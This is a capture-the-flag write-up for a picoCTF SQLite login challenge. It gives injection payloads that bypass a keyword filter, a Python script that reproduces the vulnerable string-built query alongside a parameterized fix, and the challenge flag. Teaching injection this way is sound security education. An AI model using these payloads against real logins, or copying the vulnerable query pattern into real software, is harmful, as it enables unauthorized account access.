Write-up author: jon-brandy
If the flag is not displayed after completing this challenge, try clearing your cookies.
Cookies set by other challenges may prevent the flag from displaying properly.
This website looks familiar... Log in as admin.
Site: http://mercury.picoctf.net:57359/
Filter: http://mercury.picoctf.net:57359/filter.php
- I tried to make it a little bit less contrived since the mini competition.
- Each filter is separated by a space. Spaces are not filtered.
- There is only 1 round this time, when you beat it the flag will be in filter.php.
- There is a length component now.
- sqlite
- First, open the website -> http://mercury.picoctf.net:57359/
- Try to log in with `admin` as the username and `admin` as the password, then click sign in.
- It said `filtered`.
- Now open http://mercury.picoctf.net:57359/filter.php
- filter.php lists the strings the login rejects, and `admin` is one of them, which is why the first attempt was refused before the query ever ran. Any payload has to avoid every listed string and stay within the length limit.
- Next, let's try unfiltered input: `user` as the username and `pass` as the password.
- It said `not admin`. So the query ran, but the row it matched (if any) was not the admin row. We must make the query match the username `admin` without ever typing that word.
- Since concatenation is not filtered, the easiest bypass is SQLite's `||` string operator in the username: `'ad'||'min'` evaluates to `admin` inside the query without `admin` ever appearing in our input. Now enter `ad'||'min` as the username and `pass` as the password.
- It still responded `not admin`. The username part now matches, but the query still has `AND password='pass'` at the end and we do not know the admin password, so no row comes back.
- Now let's remodel the query. The login presumably builds `SELECT username, password FROM users WHERE username='<user>' AND password='<pass>'`, so we want the password clause swallowed into the username expression instead of being evaluated:

```sql
SELECT username, password FROM users WHERE username='ad'||'min'||substr(' AND password=',0,0)||''
```

- In SQLite `substr(' AND password=',0,0)` returns the empty string, so the whole `WHERE` clause reduces to `username='admin'||''||''`, i.e. `username='admin'`. The quote that the application appends after the password closes our final `||'`, so nothing is left dangling.
- Based on that query, we fill the username as `ad'||'min'||substr(` and the password as `,0,0)||'`. Neither field contains a filtered string, and both are short enough for the length check.
- Now open the `filter.php` file. Finally we got the flag!
ALTERNATE SOLUTIONS (USING SQLite)
- If you prefer to leave the password clause in place, keep the concatenation for the username -> `ad'||'min`, and use SQLite's `IS NOT` operator in the password to force that clause to be true.
- Input the username as `ad'||'min` and the password as `a' IS NOT 'b`.
- The query becomes `WHERE username='ad'||'min' AND password='a' IS NOT 'b'`. In SQLite `=` and `IS NOT` share the same precedence and group left to right, so the password part is evaluated as `(password='a') IS NOT 'b'`, which is always true, and the `AND` is satisfied by the username match alone.
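The following script is an added example, not part of the original write-up or the challenge source. It rebuilds the vulnerable login against an in-memory SQLite database so both payloads above (the `substr(` trick and the `IS NOT` trick) can be checked locally, and shows the parameterized version that defeats them. The blocklist and the 25-character per-field limit are assumptions modelled on what filter.php shows (the page only confirms that `admin` is filtered and that a length check exists); the admin password and the table layout are constructed.

```python
import sqlite3

# Assumption: a blocklist and per-field length limit in the spirit of
# filter.php. The page confirms "admin" is filtered; the rest is constructed.
FILTERED = ("admin", "or", "and", "union", "--", "/*", "*/", ";", "=")
MAX_LEN = 25


def make_db():
    """Constructed users table; the admin password is made up."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("admin", "unknown-to-the-attacker"), ("user", "pass")],
    )
    conn.commit()
    return conn


def passes_filter(value):
    """Reject inputs that contain a blocked token or exceed the length cap."""
    low = value.lower()
    return len(value) <= MAX_LEN and not any(tok in low for tok in FILTERED)


def build_query(user, password):
    """The string-built query the write-up reasons about (vulnerable)."""
    return (
        "SELECT username, password FROM users "
        f"WHERE username='{user}' AND password='{password}'"
    )


def vulnerable_login(conn, user, password):
    """Blocklist + string concatenation, as the challenge behaves."""
    if not (passes_filter(user) and passes_filter(password)):
        return "filtered"
    row = conn.execute(build_query(user, password)).fetchone()
    if row is None or row[0] != "admin":
        return "not admin"
    return "flag"


def safe_login(conn, user, password):
    """Hardened form: bound parameters, so input is data, never SQL."""
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (user, password),
    ).fetchone()
    if row is None or row[0] != "admin":
        return "not admin"
    return "flag"


def substr_is_empty(conn):
    """Show why the substr payload works: substr(x, 0, 0) is '' in SQLite."""
    return conn.execute("SELECT substr(' AND password=',0,0)").fetchone()[0]


if __name__ == "__main__":
    db = make_db()
    print(repr(substr_is_empty(db)))
    print(vulnerable_login(db, "admin", "admin"))
    print(vulnerable_login(db, "ad'||'min", "pass"))
    print(vulnerable_login(db, "ad'||'min'||substr(", ",0,0)||'"))
    print(vulnerable_login(db, "ad'||'min", "a' IS NOT 'b"))
    print(safe_login(db, "ad'||'min'||substr(", ",0,0)||'"))
```

Run it directly to see the sequence from the write-up reproduced: the literal `admin` is filtered, plain concatenation alone is `not admin`, and both injection payloads reach the admin row, while the parameterized `safe_login` treats the same payloads as ordinary (wrong) credentials.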
SQLite CheatSheet
https://www.tutorialspoint.com/sqlite/sqlite_operators.htm
picoCTF{0n3_m0r3_t1m3_d5a91d8c2ae4ce567c2e8b8453305565}